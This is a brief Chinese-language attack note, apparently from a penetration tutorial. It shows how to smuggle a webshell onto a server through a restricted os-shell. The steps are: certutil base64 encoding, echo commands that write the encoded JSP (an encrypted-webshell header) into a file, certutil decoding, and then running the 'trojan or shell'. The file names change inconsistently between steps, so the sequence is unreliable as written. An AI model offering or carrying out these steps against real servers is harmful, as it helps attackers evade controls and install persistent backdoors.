编码
当进入到os-shell但是无法执行相关命令,采用该方式可绕过**certutil -encode err.jsp errs.jsp**
内容如下:
提取出来之后** echo "PCVAcGFnZSBpbXBvcnQ9ImphdmF4LnV0aWwuKixqYXZheC5jcnlwdG8uKixqYXZh" >> 1.asp**
得到生成的一个1.asp
解码
**certutil -decode rr.jsp rrr.jsp**
解密明文
最终,再本地执行该木马或者shell即可